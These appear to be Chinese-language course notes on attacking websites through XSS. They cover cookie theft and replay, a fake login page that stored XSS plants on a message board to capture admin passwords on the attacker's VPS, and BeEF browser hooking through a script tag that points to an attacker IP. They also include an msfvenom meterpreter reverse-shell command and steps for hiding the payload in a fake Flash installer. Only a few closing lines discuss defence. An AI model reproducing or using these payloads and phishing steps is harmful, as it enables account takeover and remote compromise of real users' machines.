远程调用xss平台网站需要在意是http还是https协议 cookie的利用
1.抓包利用
2.特定浏览器活软件
这个浏览器的使用教程
点进去之后再点击这个
然后我们开始 利用cookie
cookie有几个值我们就添加几个
3.浏览器插件
遇到的突发情况 例如空白 404
这个时候我们要有种思维
变换页面 可能是我们的管理界面被换了 只删了留言我们可以改id 或者把参数改了
如果页面也没了 我们尝试访问admin等其他目录、
当然这些都以cookie有效为前提
总的来说就是扫二级目录
遇到safedog 的登录2级验证
也是尝试二级目录更换页面
3 什么情况使用马哥欺骗工具 但是不管什么站都能使用bp
https-only开启时我们进行的攻击
利用htto-only 获取cookie有一定限制 例如下面这个
怎么确定打开http-only 使用awvs
原理 我们利用xss 让管理员进入他的登录界面后会重新进入我们制造好的钓鱼页面
进入后输入密码 我们 在返回给他正常的登录界面 在我们的vps上就有他的账号和密码了
伪造页面步骤:1.准备好http-only利用代码
源码展示 后台代码
跳转到真正的登录界面
在使用前需要先创建一个数据库
把之前已经伪造过的页面删除 我们需要创建新的伪造页面
步骤如下 正常的下载这个网页不过需要将后缀改为htm
但是这样的下载会因为编码问题出现很多问题所以我建议还是使用kali当中的下图软件进行下载
下载好后不要用外面这个
这个才是真的
下载好后查看源码 发现后台的代码还需要我们做出修改
把action修改如下
然后检查表单 用户 和 密码 修改一下name
然后就好了
接下来就是将钓鱼链接利用存储型 xss 放在留言板 进行攻击
但是管理员进入后有bug 会立刻发现自己被钓鱼了
将这一串代码放在xss代码网站
把这个代码替换了 但是下面标蓝的代码我们需要放到平台里面
把这个放进去
然后我们获取到密码后删除这个项目就行了
xss登录利用案例
这个cms会记录用户名和密码登录情况 这样就会有xss
用户名 有长度限制 然后我们 用极限代码 当然能不用 最好不要用 应为会导致界面显示不完整
beef-xss利用
kali自带 beef -xxs启动 密码也是beef 密码我们可以设置为admin溜进去的是这个代码
让我们访问一下看看源码
使用的话就是在有存储型xss代码下 加上这句话
<script src"https://192. 168. 10. 101:3000/hook.js"></script>
比较脆弱 管理员关了浏览器界面就失效了
然后当管理员进入留言板界面 不需要点击我们留言板内容不需要吸引 反正视频演示时他没有点进去 让我们的beef-xss界面就能看见我们黑进去的网站了 如下
绿色代表命令可以用 灰色 未知 橙色 容易被管理员察觉 红色不能用 可以尝试 点点或许又行
选中 然后双击下图 就能执行命令
这些命令作用 看英文就知道了 功能很强大 比简单的xss平台好用很多
创建框架 上图标蓝的地方是一种权限维持方案 使用后创建百分百隐藏框架 只要管理员在页面当中会一直停在一个页面 怎么举例呢 就是现在b站吧点进一个视频会跳出一个新网站 而不是把b站首页覆盖了 会一直维持 也就是会跳转新窗口
联合kali的MSF进行钓鱼 目前看来似乎就是往压缩包里面下毒
在kali当中输入这个命令
msfvenon -p windows/meterpreter/reverse_tcp lhost=192.168.80.103 lport=1122 -f exe > 1.exe
第一步 创建 压缩文件 勾选创建自解压格式压缩文件
第二步高级 自解压选项
选路径 不要直接c: 选择一些我们一般有权限的 怎么看呢:
选c盘随便一个文件夹 看需要管理员权限否
这种就行
第3 步 设置解压后运行下图有些错误 我们要把flash也能 解压
第4步设置 模式 有隐藏
第5步更新 覆盖所有文件
然后直接创建出来
下载flsh官网然后 改名
为了更像 去官网 在body这块彻底cv一下
然后再源码这修改下载地址 把我们的包放进去也就是我们网站根目录
第6步开监听
第7步 别人点了安装包就 监听成功
XSS平台搭建
不好用 不如自己买vps
在我们虚拟机写好代码
创建在phpstudy 然后想办法通过隧道连接外网
然后我们用的是 内网连内网 是不用隧道
主要是加载我们的phpstud网站中的 x.txt的代码
然后就打印过来了
为了防止被发现 可以改一下名字
然后是iis xss平台搭建 我没有源码没法自己搭建 需要的可以去视频1.25看
github上有
通过POST 修改为 get 然后通过管理员 去点击链接 然后显示了一个界面实际上已经创建成功我们想要的结果
防御 输入验证码
审查陌生链接源码
通过来源判断
可以用来水报告 这个漏洞 看起危险 实际上鸡肋